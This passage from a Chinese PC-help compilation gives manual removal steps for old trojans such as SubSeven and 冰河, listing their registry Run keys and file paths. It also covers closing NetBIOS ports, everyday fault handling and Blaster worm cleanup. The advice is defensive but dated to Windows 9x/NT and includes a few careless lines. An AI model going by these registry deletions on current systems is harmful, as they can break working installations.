打开注册表Regedit
点击目录至:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunServices\
删除右边的项目:Microsoft DLL Loader = "windll32.exe"
关闭保存Regedit,重新启动Windows
删除C:\WINDOWS\ windll32.exe

74.Retrieve
打开注册表Regedit
点击目录至:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\
删除右边的项目:Microsoft Access ="C:\WINDOWS\access.exe"
关闭保存Regedit,重新启动Windows
删除C:\WINDOWS\access.exe

75.Revenger
打开注册表Regedit
点击目录至:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\
删除右边的项目:AppName ="C:\...\server.exe"
关闭保存Regedit,重新启动Windows
在c:\windows查找相应的木马程序server.exe,并删除

76.Ripper
打开system.ini文件
将shell=explorer.exe sysrunt.exe
改为shell= explorer.exe
关闭保存system.ini,重新启动Windows
在c:\windows查找相应的木马程序sysrunt.exe,并删除

77.Satans Back Door
打开注册表Regedit
点击目录至:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunServices\
删除右边的项目:sysprot protection ="C:\windows\sysprot.exe"
关闭保存Regedit,重新启动Windows
删除C:\windows\sysprot.exe

78.Schwindler
打开注册表Regedit
点击目录至:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\
删除右边的项目:User.exe = "C:\WINDOWS\User.exe"
关闭保存Regedit,重新启动Windows
删除C:\WINDOWS\User.exe

79.Setup Trojan (Sshare) +Mod Small Share
打开注册表Regedit
点击目录至:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Network\LanMan\
选择右边有'C$'的项目,并全部删除
关闭保存Regedit,重新启动Windows

80.ShadowPhyre
打开注册表Regedit
点击目录至:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\
删除右边的项目:WinZipp = "C:\WINDOWS\SYSTEM\WinZipp.exe /nomsg"
或者WinZip = "C:\WINDOWS\SYSTEM\WinZip.exe /nomsg"
关闭保存Regedit,重新启动Windows
删除C:\WINDOWS\ WinZipp.exe或者C:\WINDOWS\ WinZip.exe

81.Share ALL
打开注册表Regedit
点击目录至:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Network\LanMan\
这里你将看到所有被木马共享出来的你的硬盘符号,把它们一个个删除掉。

82.ShitHeap
打开注册表Regedit
点击目录至:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunServices\
删除右边的项目:recycle-bin = "c:\windows\system\recycle-bin.exe"
或者recycle-bin = "c:\windows\system.exe"
关闭保存Regedit,重新启动Windows
删除c:\windows\system\recycle-bin.exe或者c:\windows\system.exe

83.Snid
打开注册表Regedit
点击目录至:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\
删除右边的项目:System-tray = 'c:\windows\temp$01.exe'
关闭保存Regedit,重新启动Windows
删除c:\windows\temp$01.exe

84.Softwarst
打开注册表Regedit
点击目录至:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\
删除右边的项目:NetApp = C:\windows\system\winserv.exe
关闭保存Regedit,重新启动Windows
删除C:\windows\system\winserv.exe

85.Spirit 2000 Beta
打开注册表Regedit
点击目录至:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\
删除右边的项目:internet = "c:\windows\netip.exe "
关闭保存Regedit
打开win.ini文件
查找到run=c:\windows\netip.exe
更改为:run=
关闭保存win.ini,重新启动Windows
删除c:\windows\netip.exe和c:\windows\netip.exe

86.Stealth v2.0
打开注册表Regedit
点击目录至:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\
删除右边的项目:Winprotect System = "C:\WINDOWS\winprotecte.exe
关闭保存Regedit,重新启动Windows
删除C:\WINDOWS\winprotecte.exe

87.SubSeven
打开注册表Regedit
点击目录至:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\
删除右边的项目:SystemTrayIcon = "C:\WINDOWS\SysTrayIcon.Exe"
关闭保存Regedit,重新启动Windows
删除C:\WINDOWS\SysTrayIcon.Exe

88.Telecommando
打开注册表Regedit
点击目录至:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\
删除右边的项目:SystemApp="ODBC.EXE"
关闭保存Regedit,重新启动Windows
删除C:\windows\system\ ODBC.EXE

89.The Unexplained
打开注册表Regedit
点击目录至:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\
删除右边的项目:InetB00st = "C:\WINDOWS\TEMPINETB00ST.EXE"
关闭保存Regedit,重新启动Windows
删除C:\WINDOWS\TEMPINETB00ST.EXE

90.Thing
点击目录至:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\
删除右边的项目:(Default) = "C:\some\path\here\thing.exe"
也有一些是在:
HKEY_LOCAL_MACHINE\System\CurrentControlSet\control\SessionManager\Known16DLLs\
删除右边的项目:wsasrv.exe = "wsasrv.exe"
关闭保存Regedit,重新启动Windows
删除C:\some\path\here\thing.exe

91.Transmission Scount
打开注册表Regedit
点击目录至:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\
删除右边的项目:Kernel16" = C:\WINDOWS\Kernel16.exe
关闭保存Regedit,重新启动Windows
删除C:\WINDOWS\Kernel16.exe

92.Trinoo
打开注册表Regedit
点击目录至:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\
删除右边的项目: System Services = service.exe
关闭保存Regedit,重新启动Windows
删除C:\windows\system\service.exe

93.Trojan Cow
打开注册表Regedit
点击目录至:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\
删除右边的项目:SysWindow = "C:\WINDOWS\Syswindow.exe"
关闭保存Regedit,重新启动Windows
删除C:\WINDOWS\Syswindow.exe

94.TryIt
打开注册表Regedit
点击目录至:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\
删除右边的项目:Rc5Dec = C:\Program Files\Internet Explorer\_.exe -guistart
关闭保存Regedit,重新启动Windows
删除C:\Program Files\Internet Explorer\_.exe

95.Vampire
打开注册表Regedit
点击目录至:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\
删除右边的项目:Sockets ="c:\windows\system\Sockets.exe"
关闭保存Regedit,重新启动Windows
删除c:\windows\system\Sockets.exe

96.WarTrojan
打开注册表Regedit
点击目录至:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\
删除右边的项目:Kernel32 = "C:\somepath\server.exe"
关闭保存Regedit,重新启动Windows
删除C:\somepath\server.exe


97.wCrat
打开注册表Regedit
点击目录至:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\
删除右边的项目:MS Windows System Explorer ="C:\WINDOWS\sysexplor.exe"
关闭保存Regedit,重新启动Windows
删除C:\WINDOWS\sysexplor.exe

98.WebEx
打开注册表Regedit
点击目录至:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\
删除右边的项目:RunDl32 = "C:\windows\system\task_bar"
关闭保存Regedit,重新启动Windows
删除C:\windows\system\task_bar.exe和c:\windows\system\msinet.ocx

99.WinCrash
打开注册表Regedit
点击目录至:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\
删除右边的项目:WinManager = "c:\windows\server.exe"
关闭保存Regedit
打开win.ini文件
查找到run=c:\windows\server.exe
更改为:run=
保存关闭win.ini,重新启动Windows
删除c:\windows\server.exe

100.冰河
清除木马v1.1
打开注册表Regedit
点击目录至:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
查找以下的两个路径,并删除
" C:\windows\system\ kernel32.exe"
" C:\windows\system\ sysexplr.exe"
关闭Regedit
重新启动到MSDOS方式
删除C:\windows\system\ kernel32.exe和C:\windows\system\ sysexplr.exe木马程序
重新启动。OK

*******************************************************************************************
===========================================================================================

NetBIOS 端口开放问题
--------------------------------------------------------------------------------


http://sky.net.cn 天网

天网安全在线推出全国首个在线安全检测系统--"天网医生",它可以初步检测计算机存在的一些安全隐患,并且根据检测结果判断你系统的级别,引导你进一步解决你系统中可能存在的安全隐患。不过有时,如果你安装并开启了有效的防火墙或进行了有效安全设置,天网会通常会出现一些令普通用户难以理解的结果,如下:

135端口开放!(NT,2000)
或 139端口开放!

关于天网端口扫描检测的说明:
在您电脑上,如果出现了一些标准的、容易受攻击的网络服务端口,端口扫描器会尝试建立标准的TCP/IP(网络)连接。当端口扫描器完成扫描后,那些端口是敞开着的,和从端口扫描器传送了什么连接请求都将一目了然。
检测系统在几个知名的服务端口进行,每个端口的扫描结果会分为开放、关闭和隐藏三种状态。主要是为了提醒联网的用户,在互联网上会有各种各样的端口扫描器在扫描接入互联网的各种系统的网络端口,以寻找系统的安全漏洞。


1、 如何理解并关闭135端口

135端口开放实际上是一个WINNT漏洞,开放的135的端口情况容易引起自外部的"Snork"攻击!!!

对于135端口开放的问题,可以在你的防火墙上,增加一条规则:拒绝所有的这类进入的UDP包,目的端口是135,源端口是7,19,或者135,这样可以保护内部的系统,防止来自外部的攻击。大多数防火墙或者包过滤器已经设置了很多严格的规则,已覆盖了这条过滤规则,但任需注意:有一些NT的应用程序,它们依靠UDP135端口进行合法的通讯,而打开你135的端口与NT的RPC服务进行通讯。如果真是这样,你一定要在那些原始地址的系统上(需要135口通讯),实施上述的规则,指定来自这些系统的通讯可以通过防火墙,或者,可以被攻击检测系统所忽略,以便维持那些应用程序的正常连接。

!!!为了保护你的信息安全,强烈建议你安装微软的最新NT补丁包。!!!

2、如何理解并关闭139端口(NetBIOS提供服务的tcp端口)

Netbios(NETwork Basic Input/Output System)网络基本输入输出系统。是1983年IBM开发的一套网络标准,微软在这基础上继续开发。微软的客户机/服务器网络系统都是基于NetBIOS的。在利用Windows NT4.0 构建的网络系统中,对每一台主机的唯一标识信息是它的NetBIOS名。系统可以利用WINS服务、广播及Lmhost文件等多种模式将NetBIOS名解析为相应IP地址,从而实现信息通讯。在这样的网络系统内部,利用NetBIOS名实现信息通讯是非常方便、快捷的。但是在Internet上,它就和一个后门程序差不多了。因此,我们很有必要堵上这个可怕的漏洞。

对于win9x :

在windows9x下如果你是个拨号用户。完全不需要登陆到nt局域网络环境的话。只需要在控制面板-网络-删除microsoft网络用户,使用microsoft友好登陆就可以了。但是如果你需要登陆到nt网络的话。那这一项就不能去处。因为nt网里需要使用netbios。

方法1:
1.检查NetBEUI是否出现在配置栏中。打开控制面版,双击“网络”选项,打开“网络”对话框。在“配置”标签页中检查己安装的网络组件中是否有NetBEUI。如果没有,点击列表下边的添加按钮,选中“网络协议”对话框,在制造商列表中选择微软,在网络协议列表中选择NetBEUI。点击确定,根据提示插入安装盘,安装NetBEUI。

2.回到“网络”对话框,选中“拨号网络适配器”,点击列表右下方“属性”按钮。在打开的“属性”对话框中选择“绑定”标签页,将除“TCP/IP->网络适配器”之外的其它项目前复选框中的对勾都取消!

3.回到“网络”对话框,选中“TCP/IP->拨号网络适配器”点击列表右下方“属性”按钮,不要怕弹出的警告对话框,点击“确定”。在“TCP/IP属性”对话框中选择“绑定”标签页,将列表中所有项目前复选框中的对勾都取消!点击“确定”,这时Windows会警告你“尚未选择绑定的驱动器。现在是否选择驱动器?”点击“否”。之后,系统会提示重新启动计算机,确认。

4.证实己取消绑定。重新进入“TCP/IP->拨号网络适配器”的“TCP/IP属性”对话框,选定“NetBIOS”标签页,看到“通过TCP/IP启用NetBIOS”项被清除了吧!连点两次“取消”退出“网络”对话框(不要点“确认”,免得出现什么意外)。

方法2:
运行RegEdit.exe 查找串“vnetbios”,找到后再选择“查找下一个”,将找到象“blahblah\\VxD\\VNETBIOS\\”的串,删除“VNETBIOS”项即可。 操作一定要谨慎,误操作可能导致系统崩溃,另关掉139端口后将无法共享文件和打印功能。


对于winNT :

在windowsNT下你可以取消netbios与TCP/IP协议的绑定。控制面板-网络-Netbios接口-WINS客户(tcp/ip)-禁用。确定。重启。这样nt的计算机名和工作组名也隐藏了,不过会造成基于netbios的一些命令无法使用。如net等。


对于WIN2000 :

选中网络邻居——》右键——》本地连接——》INTERNET协议(TCP/IP)——》属性——》高级——》选项——》TCP/IP筛选——》在“只允许”中填入除了137,138,139只外的端口。如果你在局域网中,会影响局域网的使用

当然还有最方便的方法:
选择一条天网的空规则,数据包方向选接收;对方IP地址选任何;协议TCP;本地端口139到139;对方端口0到0;标志位在SYN标志上打勾;动作拦截。
然后把这条规则勾上让它生效,保存即可。


最后谈谈这个后门的端口,137,138是udp端口。当通过网络邻居传输文件的时候就是通过这个2个端口.139端口是netbios提供服务的tcp端口。在windows9x下可以完全关闭这几个端口。完全禁止了netbios服务。方式是在控制面板-网络-只保留tcp/ip协议和拨号网络适配器。但是这样windows会提示你网络不完整。但是还可以继续使用。在tcp/ip协议里的netbios一项不要选择绑定到tcp/ip协议。这时候你的netbios服务完全停止了。你的机器也没有137,138和139端口了。这样追捕也搞不清你到底是9x还是unix了。windowsNT下可以封锁这些端口。封锁不必要的TCP和UDP端口可以通过在网络控制面板的IP地址对话框中进行配置来完成。 点击高级按钮激活高级IP地址对话框, 然后点击Enable Secury 对话框,然后点击配置按钮激活TCP/IP安全对话框, 那里列出了那些TCP和UDP端口被允许了。但是好像不能识别拨号网络适配器。

以上的方法都是给不需要连接入局域网的计算机的配置方法。如果你是一台拨号上网的单机那么完全可以禁止netbios服务。但是如果你需要接入局域网的话。那你只能注意加密你的共享资源了。否则全互联网的人都可以通过这个windows的“后门”到你的计算机里了:)

五十四、常遇电脑故障应急处理方法

朋友们在使用电脑的过程中,难免会遇到许多的突发故障,这些故障的起因可能是软件原因造成的,也可能是硬件故障引发的,或是其它的因素……那么,我们这些初级的电脑用户们又该如何应对这些事件呢,请看下文:

  遭遇停电
  
<现象:显示器,主机,音箱等会在一瞬间“强行关闭”。

  现象分析:这是突然“停电”造成的。由停电的瞬间产生的电压波动会冲击电脑硬件的芯片,电路,电阻等。而一旦停电时您正在进行磁盘读写操作,则有可能产生坏道,或当你在编写文稿时,则数据资料就会丢失……

  应当之策:配电脑时选配个品牌电源,这样能最大限度的从电源上减小电压波动对硬件造成的不良影响。停电后,关闭所有电源,以防下次来电时显示器和部份ATX电源同时启动,这样会造成对硬件的不良损害。当您用WORD编辑文稿时,用上WORD的自动保存功能。如果停电的瞬间恰好您在对磁盘进行操作,建议您下次开机不要在启动时跳过磁盘检测,检测有无产生坏道。一旦发现坏道,则用NORTON,PQMAGIC等工具软件来修复或屏蔽坏道。另外,如果您经济上许可,建议选配一个UPS,为电脑提供一段时间的断电保护。

  自动关机

  现象:电脑在正常运行过程中,突然自动关闭系统或重启系统。

  现象分析:现今的主板对CPU有温度监控功能,一旦CPU温度过高,超过了主板BIOS中所设定的温度,主板就会自动切断电源,以保护相关硬件。另一方面,系统中的电源管理和病毒软件也会导致这种现象发生。

  应当之策:上述突然关机现象如果一直发生,先确认CPU的散热是否正常。开机箱目测风扇叶片是否工作正常,再进入BIOS选项看风扇的转速和CPU的工作温度。发现是风扇的问题,就对风扇进行相关的除尘维护或更换质量更好的风扇。如果排除硬件的原因,进入系统,从“吻到死”的安装光盘中覆盖安装电源管理,再彻底查杀病毒。当这些因素都排除时,故障的起因就可能是电源老化或损坏,这可以通过替换电源法来确认,电源坏掉就换个新的,切不可继续使用,会烧毁硬件的
系统当机

  现象:桌面被锁定,鼠标不能动,严重时连热启动(ALT+CTRL+DEL)都不行。还有就是蓝屏现象。

  现象分析:“吻到死”系统自身的BUG以及各软件间的兼容性问题是该故障的原因,也可能是用户同一时间运行了过多的大程序,从而导致进程阻塞,引发当机。

  应对之策:当机分2种,真当和假当,二者区分的最简单方法是按下小键盘区的Numlock键,观察其指示灯有无变化。有,则假当;反之,真当。假当可以同时按下ALT+CTRL+DEL在出现的任务列表里选定程序名后标注没有响应的项,单击结束任务。真当,只有冷启动了。对于蓝屏,在按下ESC键无效后,选择重启,按机箱面板上的复位键。对于兼容性问题,可以从卸载“问题”软件和更新主板BIOS和相关主板驱动程序上来解决。

  病毒发作

  现象:系统运行缓慢,当机,非法操作,硬盘灯乱闪,经常蓝屏,以及莫名奇妙的系统提示……

  现象分析:病毒实质上是一种恶意的电脑程序代码,病毒通过大量的自身复制,同时在系统中隐秘运行,占有系统资源,严重的还会对软件和硬件造成破坏,如CIH,硬盘锁等。

  应对之策:道高一尺,魔低一丈,病毒的克星是杀毒软件。一旦怀疑自己的机器染上病毒,请重新启动系统到DOS,运行正版的杀毒软件(DOS版)这样可以杀掉在“吻到死”下杀不了的病毒;而后再启动到系统桌面,运行杀毒软件的WINDOWS版本进行再杀毒。另一方面,由于病毒发作严重时会破坏一些文件;我们就在病毒发作之前把重要的文件备份到C盘之外其它驱动器,且把数据文件的属性设定为只读。同时,大家要时刻更新杀毒软件病毒库,少用盗版碟,已上网的朋友们对不明的邮件附件千万不要下载。

  系统故障

  现象:进不了系统,典型表现为开机自检通过,在启动画面处停止,或显示:The disk is error等有E文提示的诸多现象。

  现象分析:此为系统故障,可由很多原因引起,比较常见的就是系统文件被修改,破坏,或是加载了不正常的命令行。此外,硬盘的故障也是原因之一。

  应对之策:首先要尝试能否进入安全模式,开机按F8键,选择启动菜单里的第三项:Safe model(安全模式)。进入安全模式后,可以通过设备管理器和系统文件检查器来找寻故障,遇到有“!”号的可以查明正身再确定是否del或设置中断。也可以重装驱动程序,系统文件受损可以从安装文件恢复(建议事先就把WINDOWS的安装盘复制在硬盘里)。如果连安全模式都不能进入,就通过带启动的光盘或是软盘启动到DOS,在DOS下先杀毒并且用Dir检查C盘内的系统文件是否完整,必要时可通过系统软盘进行Sys C:,恢复相关的基本系统文件。如果C盘内没有发现文件,则只有对系统进行彻底重装。
驱动丢失

  现象:开机时16色显示,放音频文件时显示“XXX”设备正被占用。

  现象分析:排除病毒的原因后,这种现象多发生在用过N个月的老机子上,或用户新近动过主机内的部件,(如显卡和PCI卡),则可能造成该硬件的接触不良,导致系统实质上并没有彻底检测到相关硬件。

  应对之策:重新安装显卡的驱动程序,并检查相关配件与主板是否完全接触:一是要保证显卡,声卡金手指上的清洁,二是将其插入相关插槽时用力适当,对准垂直插入即可,再接上与之搭配的音箱和显示器连线。必要时,可以更换PCI卡的插槽位置,避免和显卡产生资源冲突。

  开机黑屏

  现象:开机黑屏,没有显示,可能会有报警声。

  现象分析:硬件之间接触不良,或硬件发生故障,相关的硬件涉及到内存,显卡,CPU,主板,电源等。电脑的开机要先通过电源供电,再由主板的BIOS引导自检,而后通过CPU,内存,显卡等。这个过程反映在屏幕上叫自检,先通过显卡BIOS的信息,再是主板信息,接着内存,硬盘,光驱等。如果这中间哪一步出了问题,电脑就不能正常启动,甚至黑屏。

  应对之策:首先确认外部连线和内部连线是否连接顺畅。外部连线有显示器,主机电源等。内部有主机电源和主机电源接口的连线(此处有时接触不良)。比较常见的原因是:显卡,内存由于使用时间过长,与空气中的粉尘长期接触,造成金手指上的氧化层,从而导致接触不良。对此,用棉花粘上适度的酒精来回擦拭金手指,待干后插回。除此外,观察CPU是否工作正常,开机半分钟左右,用手触摸CPU风扇的散热片是否有温度。有温度,则CPU坏掉的可能性就可基本排除。没温度就整理一下CPU的插座,确保接触到位。这之后还没温度,阁下的CPU就可以升级了:(除了上面的方法外,还有一招必杀技:用拔跳线的方法清除BIOS设置或更换主板的CMOS电池。当这些方法都尝试过并全部失败的话,就可以召唤大虾哥出山相助了。

  怪响异味

  现象:听到怪响或者闻到异味。

  现象分析:怪响,可能是由于硬盘的坏道造成硬盘发出的(格格的刺耳声);也有可能是硬盘,光驱螺丝没有上牢,造成机箱的共振。异味,多为焦糊味,很刺鼻子的那种。

  应对之策:首先关闭电源。若是怪响,则打开机箱面板,一一检查,若是坏道,则修复或屏蔽。对于异味,要千万小心。这时用你的鼻子闻闻,找到发出异味的部件,然后卸下交由电脑公司处理,在这中间,大家一定要捍卫自己的消费者权益。(没过质保期的——该换的换,该修的修。)这个千万大意不得!因为,笔者的昂达光驱就是闻到焦糊味后断电不及(慢了N秒)给活活烧坏驱动芯片(Firewall)的,而后,再拿钱找JS大叔也没办法。(所以大家如果闻到异味,马上断掉电源,然后再下开机箱寻找原因,但是显示器千万别开,只能交由专业人员维修,那可是有高压电的,千万别拿自己的生命开玩笑。

五十五、常见死机原因剖析

大家都知道死机是你在使用计算机过程中最常见的故障之一,而造成死机的原因却扑朔迷离,让人难以捉摸,甚至还一度让你……。在以前dos时代,造成死机原因通常是以病毒为主,当然也有其它方面的原因,如应用软件的设置等等,所以解决死机也就有一定的模式,具体就是先杀毒,检查硬盘空间是不是够用,接着检查autoexec.bat和config.sys文件中是否有错误命令,如果问题还得不到解决,可以检查检查硬件,如此而已。而现在却不同啦,现在是windows时代了,造成死机的原因却是千变万化,所以处理起来相当的棘手。不管咋样,解决死机都是先软后硬,而软件方面当然是先进行杀毒,接着进行一些应用软件、驱动程序等等的安装,你也别忘了注册表的编辑和cmos的一些设置哟,最后教你一招最有效的方法就是将硬盘格掉(开句玩笑而已)。硬件方面主要是散热问题,现在的机子跑得快,当然产生的热量也就多,接着使用最有效的硬件排故障方法——替换法,找出真凶。说了这么多还是具体来谈谈死机,从计算机的启动、运行和关机阶段出现死机现象进行简单的剖析。

  【启动过程中的死机 】
  要分析计算机在启动时出现的死机现象,首先你得清楚计算机系统的启动顺序,从而分析出计算机是因软件问题还是硬件故障引起的死机。所以在这儿有必要简要介绍一下计算机系统的启动顺序:打开计算机电源→检测显卡→检测内存→执行bios→检测其它设备(cpu、硬盘等等设备)→执行操作系统(os)的初始化文件。而操作系统的启动过程就比较复杂一些,首先是将rom(只读存储器)中的bootstrap loader程序和自诊断程序转送到ram(随机存储器)中,随着bootstrap loader的运行,操作系统的系统文件也将装载到ram中,接着执行io.sys和msdos.sys这两个系统文件,此时计算机显示器上将出现“starting windows 98……”画面,最后初始化system.ini和win.ini,读取注册表文件。到此如果没有任何问题,就会成功的启动计算机系统。下面就介绍一下在这一过程中出现的死机现象。
  开机后计算机系统无任何反应:如果电源没有启动,看看电源线是不是没有连接好,连好电源线无任何好转,故障可能是电源有问题,更换电源试试。
  开机后计算机显示器无任何反应,且伴随有1长2短报警声音后死机:首先排除了是显示器故障,因为即使显示器有故障是不会引起计算机死机的,这种情况多半是由于显示卡没有插到位或是松动了,打开机箱重新安装一下显示卡,或者换一个插槽试一试,这样问题即可解决。
  显示器出现短暂的显示适配器信息,且伴随有1长1短的警报声音后死机:既然出现了显示适配器信息,则说明显示适配器没问题,这种情况往往是内存存在故障,解决的方法是打开机箱重新安装一下内存条试一试,如果还不行的话,换一条内存条试一试,当然你一定要好好地仔细地看看扩展槽是不是完好,这样肯定能够排除这一故障。
  bios升级失败后的死机:找出同型号bios主板的计算机,在这计算机上将bios程序备份出来,利用bios刷新程序将其刷新即可,前提是bios能够进行刷新。
  cmos设置不当造成的死机:这个故障就非常之多,在此仅举常见的例子,如硬盘参数设置不当或模式设置不当导致计算机无法启动,内存参数设置不当,如没有ecc功能的内存将其设为具有ecc功能,这样常常会因内存错误而造成计算机死机,等等许多例子,用户只须将设置修正过来即可。
  计算机超频后启动计算机死机:现在超频对广大计算机用户来说是一个非常时尚的话题,时不时的就对计算机进行超频,尤其是现在许多主板生产商将超频放在cmos中,这样diy 们别提有多高兴,因为超频更方便快捷,但是超频有极限吗?不得而知,如果是超频后在重新启动计算机过程中死机的话,那就是你的超频太高啦,需要降低一些。
系统文件的误删或错误造成计算机无法启动而呈现死机状态:由于windows启动需要command.com、io.sys、msdos.sys和drvspace.bin四个文件,如果这些文件遭破坏或者被误删了的话,即使在cmos中各种硬件设置正确无误,也是无济于事,肯定系统无法启动,解决问题的方法只有用软盘启动计算机(当然是系统版本相同的系统盘),然后键入 sys c:即可。
初始化文件遭破坏致使计算机无法启动而呈现死机状态:由于windows启动需要读取system.ini、win.ini和注册表文件(user.dat、system.dat),如果存在有config.sys和 autoexec.bat文件当然也是要读取的,只要这些文件中存在错误信息都可能出现死机现象,特别是system.ini、win.ini、user.dat和system.dat这四个文件尤为重要,只要有一丁点错误系统将无法启动,为此笔者强烈建议用户平时一定要对这四个文件进行备份。

  【运行过程中的死机】
  运行时死机是指我们在使用windows的过程中出现的死机情况,也就是说在windows操作平台下运行一些应用程序而无怨无故的出现死机现象。这种现象一些是应用程序与操作系统之间存在冲突,一些是应用程序本身就有bug等等,下面就对运行中出现的死机现象加以说明。
  运行某些应用程序时出现的死机现象:造成这种故障的原因大致有三种可能,一是应用程序被病毒感染,再就是应用程序本身存在bug,还有就是应用程序与操作系统之间存在一些冲突。
  资源不足造成的死机:在使用过程中打开应用程序过多,占用了大量的系统资源,致使在使用过程中出现的资源不足现象,因此在使用比较大型的应用软件时,最好少打开与本应用程序无关的软件。
  硬盘剩余空间太少或者是碎片太多造成的死机:如果硬盘的剩余空间太少,由于一些应用程序运行需要大量的内存,这样就需要虚拟内存,而虚拟内存则是硬盘所赋予的,所以硬盘要有足够的剩余空间以满足虚拟内存的需求;还有就是我们要养成定期定时整理硬盘的习惯。
  一些文件被覆盖而造成运行一些应用程序死机现象:在安装新的应用程序时出现一些文件覆盖提示,笔者建议你最好不对任何文件进行覆盖操作,否则可能造成运行一些应用出现死机现象(预防)。
  一些文件被删除而造成运行一些应用程序死机现象:在我们卸载一些应用程序时往往会出现对某些文件是否删除的提示,如果你不是特别清楚该文件与其它文件有无关系的话,最好不要将其删除,否则可能造成运行某些应用程序因缺少某些文件而出现死机现象,甚至于造成整个系统崩溃的惨状(预防)。
  程序运行后鼠标键盘均无反应:应用程序运行后死机,说明该应用程序没有正常结束运行,一直占用着系统资源,而操作系统不清楚这情况。结束应用程序只有实施强制手段,即同时按住ctrl、alt和del键,结束任务即可。
  设置省电功能导致显示器频繁黑屏死机:一般是由于在bios中将节能时间设置过短,或者是在屏幕保护程序中设置的时间太短。
  硬件超频造成运行中的死机:超频后计算机能够启动,说明超频是成功的,为什么运行会出现死机呢?一般是由于超频后硬件产生大量的热量无法及时地散发而造成的死机现象,所以往往我们超频的同时也要对散热装置进行合理的改善。
  硬件方面:计算机硬件配置太低、内存速度不匹配(死机现象:鼠标可以移动,点击无反应)、中断设置造成硬件之间的冲突、各种驱动程序不相匹配等等也可能造成在运行中死机的现象。


  【关闭系统时的死机】
  在退出操作系统时出现的死机是指在退出windows系统或者退回dos状态时出现的死机现象。windows如果不能彻底关机,就会把磁盘缓冲区里的数据写到硬盘上,然后进入一个死循环,除非用户重新启动系统,否则是无法关闭系统的。造成这一现象的原因可能与操作系统设置和某些驱动程序设置不当有关,一般windows在退出系统或者退回dos状态时都会关闭正在使用的驱动程序,而这些驱动程序也会根据当时的情况进行一次数据回写操作,但要是驱动程序设置不当,驱动程序就找不到使用设备,因此它就不停地进行设备的搜索动作,从而形成一种假死机现象。

总之引起死机的原因很多,不管怎样,我们处理死机问题的一般方法就是先软后硬,即先考虑应用软件后考虑硬件故障,重点应放在软件方面,具体就是主要在应用软件的安装设置和一些驱动程序的安装设置方面来查找原因。最后再查找硬件方面的原因,一般硬件方面的原因都可以通过系统设置中的设备管理或者可以从windows操作系统附件的系统信息中查找到。

五十六、处理冲击波


  病毒中文名:冲击波(包括很多变种)
  病毒类型:蠕虫病毒
  攻击对象:Windows NT 4.0,Windows 2000,Windows XP,Windows Server 2003等
  传播途径:“冲击波”是一种利用Windows系统的RPC(远程过程调用,是一种通信协议,程序可使用该协议向网络中的另一台计算机上的程序请求服务)漏洞进行传播、随机发作、破坏力强的蠕虫病毒。它不需要通过电子邮件(或附件)来传播,更隐蔽,更不易察觉。它使用IP扫描技术来查找网络上操作系统为Windows 2000/XP/2003的计算机,一旦找到有漏洞的计算机,它就会利用DCOM(分布式对象模型,一种协议,能够使软件组件通过网络直接进行通信)RPC缓冲区漏洞植入病毒体以控制和攻击该系统。
  中毒症状:
  1.系统资源紧张,应用程序运行速度异常;
  2.网络速度减慢,“DNS”和“ⅡS”服务遭到非法拒绝,用户不能正常浏览网页或收发电子邮件;
  3.不能进行复制、粘贴操作;
  4.Word、Excel、PowerPoint等软件无法正常运行;
  5.系统无故重启,或在弹出“系统关机”警告提示后自动重启等等。

  应急办法:
  如果不小心感染病毒,可以使用如下步骤进行查杀:
  1.关闭“系统关机”提示框
  在出现关机提示时,在“开始→运行”中输入“shutdown -a”,即可取消“系统关机”提示框,该方法确保用户有足够的时间下载补丁。
  2.下载针对“冲击波”的补丁
  Windows 2000简体中文版补丁下载地址http://www.microsoft.com/downloads/details.aspx?displaylang=zh-cn&familyid=c8b8a846-f541-4c15-8c9f-220354449117
  Windows XP 简体中文版(32位)补丁下载地址:
 http://www.microsoft.com/downloads/details.aspx?displaylang=zh-cn&familyid=2354406c-c5b6-44ac-9532-3de40f69c074
  Windows Server 2003 中文版(32位))补丁下载地址:
 http://www.microsoft.com/downloads/details.aspx?displaylang=zh-cn&familyid=f8e0ff3a-9f4c-4061-9009-3a212458e92e
  在下载补丁时,要注意不同的操作系统、不同的版本均有不同的补丁,不可混淆。安装补丁时,盗版Windows XP系统可能不能正常安装,Windows 2000操作系统则必须升级SP2以上版本才可安装。
